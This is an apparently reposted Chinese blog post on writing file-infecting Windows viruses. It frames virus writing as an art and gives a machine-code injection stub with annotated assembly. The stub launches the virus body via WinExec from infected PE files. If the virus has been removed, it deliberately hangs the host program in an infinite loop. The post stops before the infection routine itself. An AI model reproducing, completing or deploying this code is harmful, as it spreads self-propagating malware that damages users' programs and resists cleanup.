现在的位置: 首页 > 综合 > 正文

关于感染型病毒的那些事

2012年02月20日 ⁄ 综合 ⁄ 共 2415字 ⁄ 字号 评论关闭

http://blog.csdn.net/GaA_Ra/archive/2010/06/27/5697579.aspx

在我看来,感染型病毒才是真正称得上为病毒,因为感染型病毒的手动清除比较困难,大学的时候,帮同学杀毒最烦躁的就是碰上感染型的病毒,除非写一个程序自动处理,不然手动清除是相当麻烦的.当然我所谓的真正病毒主要是在我看来,能够轻易用手工清除的病毒都不是好的病毒.现在病毒制造者追求的是快速的传播速度,而忽略了病毒的"顽固性",一个木马简单的就使用一个启动的注册表项显然在清理上太方便了,甚至可以进安全模式删了注册表项,连病毒尸体都可以无视,这样就已经不能发挥作用了.

    随着对PE格式的深入研究和高级语言的发展,编写感染型的病毒已经不再是只能用asm才能做到的.高级语言如VC同样也可以完成,不过缺点就是编译出来的病毒体太大.也是,现在的硬件水平,人们已经不再在乎这10+KB的空间.但是,病毒编写是一种艺术,这种艺术在于它的隐蔽性,短短的注入100byte,利用程序本身的空隙不增加程序的长度是这种艺术的体现.当然,代码长度的限制也必然导致注入代码功能的减少.一个星期前写了一个感染型病毒的雏形,写下来当作是一种复习吧.

 

注入感染:

    既然PE程序本身存在的空白可利用空间不大.那么采取一种折中的方式,在感染PE文件时,注入病毒文件的启动代码,这样就节省了大部分空间,当检查到病毒实体被清除后,可以采取破坏宿主程序运行流程的方式进行"示威"

 

  1. unsigned char InjectCode[] = {  
  2. 0x68, 0x44, 0x33, 0x22, 0x11, 0x33, 0xC0, 0x64,  
  3. 0xFF, 0x30, 0x64, 0x89, 0x20, 0x50, 0x68, 0x44,  
  4. 0x33, 0x22, 0x11, 0xB8, 0x44, 0x33, 0x22, 0x11,  
  5. 0xFF, 0xD0, 0x3C, 0x02, 0x74, 0x1E, 0x33, 0xC0,   
  6. 0x64, 0x8F, 0x00, 0x5A, 0x68, 0x44, 0x33, 0x22,   
  7. 0x11, 0xC3, 0x68, 0x44, 0x33, 0x22, 0x11, 0x8B,   
  8. 0x44, 0x24, 0x0A, 0x8F, 0x80, 0xB8, 0x00, 0x00,   
  9. 0x00, 0x33, 0xC0, 0xC3, 0xEB, 0xFE  
  10. };  
  11. /*********************************************** 
  12. InjectCode[] =  
  13. __asm 
  14.     { 
  15.         PUSH 11223344H              ;安装SEH 
  16.         XOR EAX,EAX 
  17.         PUSH DWORD PTR FS:[EAX] 
  18.         MOV DWORD PTR FS:[EAX],ESP 
  19.         PUSH EAX                    ;uCmdShow 
  20.         PUSH 11223344H              ;lpCmdLine 
  21.         MOV EAX,11223344H           ;offset aWinExec 
  22.         CALL EAX                    ;Call WinExec 
  23.         CMP AL,2                    ;判断病毒存在与否 
  24.         JE LABEL                    ;不存在则跳去死循环 
  25.         XOR EAX,EAX                 ;卸载SEH 
  26.         POP DWORD PTR FS:[EAX] 
  27.         POP EDX 
  28.         PUSH 11223344H              ;宿主程序原OEP 
  29.         RETN                        ;返回执行 
  30.         PUSH 11223344H              ;SEH异常处理程序 
  31.         MOV EAX,DWORD PTR [ESP+10] 
  32.         POP DWORD PTR [EAX+0B8H]    ;将宿主OEP作为安全地址返回 
  33.         XOR EAX,EAX 
  34.         RETN 
  35. LABEL: 
  36.         JMP LABEL                   ;JMP -1(OxEBFE) 
  37.     } 
  38. ************************************************/  

 

 

    注入代码就是下面_asm中汇编代码的对应的机器码.

    这部分注入代码的运行流程是:安装SEH->WinExec()->判断运行是否成功->不成功则进入死循环,成功则返回宿主执行

    安装SEH主要是为了保证注入感染后程序的健壮性,因为WinExec()的地址是硬编码进去,如果换了系统容易导致异常,安装SEH后如果出现异常也可以返回宿主代码执行.11223344H是占位地址,需要改成相应的地址.这里使用WinExec而不用CreateProcess主要是后者的函数参数太多,使用WinExec的实质也是调用CreateProcess,但是参数只有2个,节省了10多个字节的空间.并且由于我们已经安装了SEH,也不怕Winexec产生异常.

    有了上面的注入代码,搜集必要地址信息完善注入代码后就可以进行感染.

    To be continue...

抱歉!评论已关闭.